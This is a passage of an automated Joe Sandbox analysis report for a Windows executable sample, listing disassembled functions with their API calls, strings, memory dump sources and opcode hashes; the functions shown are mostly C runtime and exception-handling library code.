                                                                  • Opcode ID: 2f1ba494e88771337f45c52a1bdd7358bb1a852e26cadc68df8db2b6343d09fe
                                                                  • Instruction ID: d20ee6b8477c0c243330d9cee297807aef4a887e61db8673c5507edcc9854c4b
                                                                  • Opcode Fuzzy Hash: 2f1ba494e88771337f45c52a1bdd7358bb1a852e26cadc68df8db2b6343d09fe
                                                                  • Instruction Fuzzy Hash: 91D1B471A00A059FCB04DF68C885B5FB7A4FF85324F14826EE825AB3D1D778A905CF98
                                                                  Function 00416618 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __getptd.LIBCMT ref: 00416624
                                                                    • Part of subcall function 00416841: __getptd_noexit.LIBCMT ref: 00416844
                                                                    • Part of subcall function 00416841: __amsg_exit.LIBCMT ref: 00416851
                                                                  • __getptd.LIBCMT ref: 0041663B
                                                                  • __amsg_exit.LIBCMT ref: 00416649
                                                                  • __lock.LIBCMT ref: 00416659
                                                                  • __updatetlocinfoEx_nolock.LIBCMT ref: 0041666D
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1648532190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.1648514197.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648557175.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648579423.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648607823.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648629408.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648652860.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648671835.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648693815.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648720807.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648819682.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648873951.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648892612.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648920828.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649041464.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_400000_4JwhvqLe8n.jbxd
                                                                  Similarity
                                                                  • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                  • String ID:
                                                                  • API String ID: 938513278-0
                                                                  • Opcode ID: c0b35fab3b28cc08379f738c0b6819e885caef556e0597232c6272927c57954c
                                                                  • Instruction ID: aa41efd1d423b8a5d10240cf30fe7f6fdfe2eb4a552ee744cdd5a7d3d78d06b6
                                                                  • Opcode Fuzzy Hash: c0b35fab3b28cc08379f738c0b6819e885caef556e0597232c6272927c57954c
                                                                  • Instruction Fuzzy Hash: BEF09631D443149BD625BB7AA807BDD37A06F00718F12010FFC54662C2CB2C99C0DA5D
                                                                  Function 0040D8E2 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 139COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • UrlEscapeW.SHLWAPI(00000000,?,?,00408B1C), ref: 0040D8FC
                                                                  • UrlEscapeW.SHLWAPI(00000000,?,?,00003000,?,?,00003000,80070057,?,?,00408B1C), ref: 0040D975
                                                                    • Part of subcall function 00401000: __CxxThrowException@8.LIBCMT ref: 00401012
                                                                  • _wcsnlen.LIBCMT ref: 0040D98A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1648532190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.1648514197.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648557175.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648579423.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648607823.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648629408.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648652860.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648671835.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648693815.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648720807.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648819682.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648873951.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648892612.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648920828.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649041464.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_400000_4JwhvqLe8n.jbxd
                                                                  Similarity
                                                                  • API ID: Escape$Exception@8Throw_wcsnlen
                                                                  • String ID: pO[wPJ[w
                                                                  • API String ID: 3869000346-2007296054
                                                                  • Opcode ID: 5ca6acc30a430e574c9760774463274ab4bad4654caa39c02441de65d58d91ac
                                                                  • Instruction ID: d1cb98987559650d629e73c162e3cbdd425e347001b25a3870b1e644c1132242
                                                                  • Opcode Fuzzy Hash: 5ca6acc30a430e574c9760774463274ab4bad4654caa39c02441de65d58d91ac
                                                                  • Instruction Fuzzy Hash: 9E51D471A006019FE711DFB9C881B5EB7E1EF44324F14863EE491A73E0EB78A904CB54
                                                                  Function 00404830 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 113windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 00406810: LoadLibraryW.KERNEL32(?,00000010,?,?,?,?,00000000,00000000), ref: 00406849
                                                                  • GetDesktopWindow.USER32 ref: 0040491B
                                                                  • MessageBoxW.USER32(00000000), ref: 00404922
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1648532190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.1648514197.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648557175.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648579423.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648607823.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648629408.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648652860.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648671835.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648693815.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648720807.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648819682.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648873951.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648892612.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648920828.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649041464.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_400000_4JwhvqLe8n.jbxd
                                                                  Similarity
                                                                  • API ID: DesktopLibraryLoadMessageWindow
                                                                  • String ID: Error$core_launch_failure
                                                                  • API String ID: 2291125156-1231388645
                                                                  • Opcode ID: ac2b762cd6f21a1793c955fc009723a0a690ed81f3d34301eb5dcc339244b6ac
                                                                  • Instruction ID: b6af9d4a25f12b9ad618caaa04b1bce89d1bc1c33f14e2b071967ea1dc6fa62c
                                                                  • Opcode Fuzzy Hash: ac2b762cd6f21a1793c955fc009723a0a690ed81f3d34301eb5dcc339244b6ac
                                                                  • Instruction Fuzzy Hash: 6841F6B16006059FD704DB68C841FAAB3B5FF89324F14C7AEE525A73D1DB38AA05CB94
                                                                  Function 00411870 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 87stringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • lstrcmpiW.KERNEL32(console,00000000,?,?,00404392,?,?,?,00000004,00000001,00403CC0,00000000,00000001), ref: 00411895
                                                                  • std::_Xinvalid_argument.LIBCPMT ref: 004118FD
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1648532190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.1648514197.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648557175.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648579423.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648607823.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648629408.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648652860.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648671835.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648693815.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648720807.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648819682.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648873951.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648892612.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648920828.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649041464.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_400000_4JwhvqLe8n.jbxd
                                                                  Similarity
                                                                  • API ID: Xinvalid_argumentlstrcmpistd::_
                                                                  • String ID: console$list<T> too long
                                                                  • API String ID: 223919002-314115197
                                                                  • Opcode ID: d78708c6e26ceb291887379b36f3f026355c379ba291dcf09bcf33e7ea10b113
                                                                  • Instruction ID: dfc77e77174de3d0180958bea3bcf2e3a491de6f7e9e655ee83e3060e2856bce
                                                                  • Opcode Fuzzy Hash: d78708c6e26ceb291887379b36f3f026355c379ba291dcf09bcf33e7ea10b113
                                                                  • Instruction Fuzzy Hash: C62121317002259FC710DFA9D880AA6F3D9EF48324B05C2AAED588B351DB35EC80C7D8
                                                                  Function 00411D70 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 85COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1648532190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.1648514197.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648557175.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648579423.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648607823.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648629408.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648652860.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648671835.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648693815.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648720807.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648819682.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648873951.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648892612.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648920828.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649041464.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_400000_4JwhvqLe8n.jbxd
                                                                  Similarity
                                                                  • API ID: __wcsicoll
                                                                  • String ID: true$yes
                                                                  • API String ID: 3832890014-2567188892
                                                                  • Opcode ID: 240633a689e3ec326197cc86427cabd57f99d37e8cdc38ffffa653c739971018
                                                                  • Instruction ID: 056d6a437137f40ddd0f9b55810a2cd9cc2c27070f95a7c871400e051a22f119
                                                                  • Opcode Fuzzy Hash: 240633a689e3ec326197cc86427cabd57f99d37e8cdc38ffffa653c739971018
                                                                  • Instruction Fuzzy Hash: 5A21E1716406049FD710CB99DC41B9AF3A8FB85371F14836BE924833E0E739AD05CA98
                                                                  Function 00403407 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • std::exception::exception.LIBCMT ref: 00403426
                                                                    • Part of subcall function 00413A01: std::exception::_Copy_str.LIBCMT ref: 00413A1C
                                                                  • __CxxThrowException@8.LIBCMT ref: 00403417
                                                                    • Part of subcall function 00415988: RaiseException.KERNEL32(?,?,?,?), ref: 004159CA
                                                                  • __CxxThrowException@8.LIBCMT ref: 0040343B
                                                                    • Part of subcall function 00403560: GetModuleFileNameW.KERNEL32(00000000,?,00000104,9C2039C9,00000000,?,00000001), ref: 004035A3
                                                                    • Part of subcall function 00403560: _wcsrchr.LIBCMT ref: 004035B6
                                                                    • Part of subcall function 00403560: SetCurrentDirectoryW.KERNEL32(?,?,00000001), ref: 004035CE
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1648532190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.1648514197.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648557175.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648579423.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648607823.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648629408.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648652860.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648671835.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648693815.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648720807.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648819682.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648873951.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648892612.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648920828.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649041464.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_400000_4JwhvqLe8n.jbxd
                                                                  Similarity
                                                                  • API ID: Exception@8Throw$Copy_strCurrentDirectoryExceptionFileModuleNameRaise_wcsrchrstd::exception::_std::exception::exception
                                                                  • String ID: xsB
                                                                  • API String ID: 2761665094-962849395
                                                                  • Opcode ID: 1b2f38a8a05e39e33b413d8fef802326639c188257957995a35008b92eec63ee
                                                                  • Instruction ID: c93339cf9368618aa92baf390853cbc41d89bd29fa15fd629511ca6a49be4a75
                                                                  • Opcode Fuzzy Hash: 1b2f38a8a05e39e33b413d8fef802326639c188257957995a35008b92eec63ee
                                                                  • Instruction Fuzzy Hash: 3D1166B19142155BC700FFB6AC464EFB7A8AD84358F40093FF851B7181EB3C9A0886EA
                                                                  Function 004111AE Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 41COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • std::exception::exception.LIBCMT ref: 004111CD
                                                                    • Part of subcall function 00413A01: std::exception::_Copy_str.LIBCMT ref: 00413A1C
                                                                  • __CxxThrowException@8.LIBCMT ref: 004111BE
                                                                    • Part of subcall function 00415988: RaiseException.KERNEL32(?,?,?,?), ref: 004159CA
                                                                  • __CxxThrowException@8.LIBCMT ref: 004111E2
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1648532190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.1648514197.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648557175.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648579423.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648607823.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648629408.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648652860.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648671835.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648693815.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648720807.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648819682.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648873951.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648892612.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648920828.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649041464.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_400000_4JwhvqLe8n.jbxd
                                                                  Similarity
                                                                  • API ID: Exception@8Throw$Copy_strExceptionRaisestd::exception::_std::exception::exception
                                                                  • String ID: xsB
                                                                  • API String ID: 2939012366-962849395
                                                                  • Opcode ID: 41f9b13ae497cfe8640b41a49ab00bd169d6d1b31c3e9db4d8a233446f3517e7
                                                                  • Instruction ID: 0be7496b70bc6fec9745d464b0648aa59ac1e126cae545bd80240c4e67d28df4
                                                                  • Opcode Fuzzy Hash: 41f9b13ae497cfe8640b41a49ab00bd169d6d1b31c3e9db4d8a233446f3517e7
                                                                  • Instruction Fuzzy Hash: 18F054F2910118AAC711EFD4A9418EFB7E89F44304B10446BF905B2141DA795F4487FA
                                                                  Function 00404B73 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 33COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • std::exception::exception.LIBCMT ref: 00404B96
                                                                    • Part of subcall function 00413A01: std::exception::_Copy_str.LIBCMT ref: 00413A1C
                                                                  • __CxxThrowException@8.LIBCMT ref: 00404B83
                                                                    • Part of subcall function 00415988: RaiseException.KERNEL32(?,?,?,?), ref: 004159CA
                                                                  • __CxxThrowException@8.LIBCMT ref: 00404BAB
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1648532190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.1648514197.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648557175.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648579423.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648607823.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648629408.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648652860.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648671835.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648693815.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648720807.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648819682.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648873951.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648892612.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648920828.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649041464.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_400000_4JwhvqLe8n.jbxd
                                                                  Similarity
                                                                  • API ID: Exception@8Throw$Copy_strExceptionRaisestd::exception::_std::exception::exception
                                                                  • String ID: xsB
                                                                  • API String ID: 2939012366-962849395
                                                                  • Opcode ID: 09ac8663572faa41aee483b52a40b93fdceb60dc58fff27d6276f71200c00db7
                                                                  • Instruction ID: aa8cd1588735c51515c65f38322514867c9c2a5ba688d37fb35725eccd3fef46
                                                                  • Opcode Fuzzy Hash: 09ac8663572faa41aee483b52a40b93fdceb60dc58fff27d6276f71200c00db7
                                                                  • Instruction Fuzzy Hash: 7BE0ECB5990218EADF04EFD1DC46FEDB7746F48749F50440EF5053A181D77C62888A7A
                                                                  Function 004109C6 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • std::exception::exception.LIBCMT ref: 004109EB
                                                                    • Part of subcall function 00413A01: std::exception::_Copy_str.LIBCMT ref: 00413A1C
                                                                  • __CxxThrowException@8.LIBCMT ref: 004109DC
                                                                    • Part of subcall function 00415988: RaiseException.KERNEL32(?,?,?,?), ref: 004159CA
                                                                  • __CxxThrowException@8.LIBCMT ref: 00410A00
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1648532190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.1648514197.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648557175.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648579423.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648607823.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648629408.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648652860.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648671835.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648693815.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648720807.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648819682.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648873951.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648892612.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648920828.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649041464.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_400000_4JwhvqLe8n.jbxd
                                                                  Similarity
                                                                  • API ID: Exception@8Throw$Copy_strExceptionRaisestd::exception::_std::exception::exception
                                                                  • String ID: xsB
                                                                  • API String ID: 2939012366-962849395
                                                                  • Opcode ID: ba21db6094558bbda92e9fdb070596c334fcf61a668c5e12c5c07b178eb4eb90
                                                                  • Instruction ID: b8b88d8bb8466062e5abec39d0c36b4c19769e7e1302a3700d13e2ed555ba46e
                                                                  • Opcode Fuzzy Hash: ba21db6094558bbda92e9fdb070596c334fcf61a668c5e12c5c07b178eb4eb90
                                                                  • Instruction Fuzzy Hash: 8FE01AB5950258EF8B05EF91D881CFFB7B9AFC8714B10451EF81677140CB386A09CA79
                                                                  Function 004123C2 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 23COMMON
                                                                  Download Yara Rule
                                                                  APIs
